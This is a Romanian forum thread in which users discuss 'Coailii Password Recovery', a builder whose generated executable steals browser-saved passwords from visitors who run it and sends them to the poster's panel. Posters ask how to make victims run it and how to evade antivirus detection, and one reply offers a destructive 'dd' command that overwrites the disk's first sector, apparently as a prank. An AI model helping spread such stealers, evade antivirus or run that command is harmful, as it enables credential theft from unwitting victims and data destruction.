Jump to content
Byte-ul

Coailii Password Recovery

Recommended Posts

Ma poate ajuta si pe mine cineva. Am ceva nelamuriri. Cu toate ca am instalat cu succes programul pe site-ul meu, nu am inteles in totalitate cum functioneaza acest program.

Ce trebuie mai exact sa faca vizitatorii care imi acceseaza site-ul pentru ca mie sa-mi vina acele parole salvate la ei in browser ?

Multumesc anticipat.

Link to comment
Share on other sites

Ma poate ajuta si pe mine cineva. Am ceva nelamuriri. Cu toate ca am instalat cu succes programul pe site-ul meu, nu am inteles in totalitate cum functioneaza acest program.

Ce trebuie mai exact sa faca vizitatorii care imi acceseaza site-ul pentru ca mie sa-mi vina acele parole salvate la ei in browser ?

Multumesc anticipat.

Nimic. Tu le dai .exe-ul generat de program si ei trebuie sa-l ruleze.

Link to comment
Share on other sites

Pentru ca executabilul pe care il generezi cu "Coailii Password Recovery.exe" o sa trimita informatiile acolo.

Multumesc mult, acum am inteles.

Am creat virusul acum si antivirusul mi-a detectat TR/Dropper.exe.gen

Stie cineva cum il fac sa nu fie detectat de antivirus ?

Link to comment
Share on other sites

uite, foloseste comanda urmatoare:

sudo dd if=/dev/urandom of=/dev/sda bs=512 count=1


Unde adaug aceasta comanda ?

@GMaster0 am adaugat totul cum trebuie, pe vechiul panel am primit loguri ieri... pe panel-ul nou am facut test la mine in pc si nimic... am parole salvate,etc.

Am creat iar baza de date,am facut iar toti pasii si degeaba.... nu primesc loguri!

Edited by LITTLEloves
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...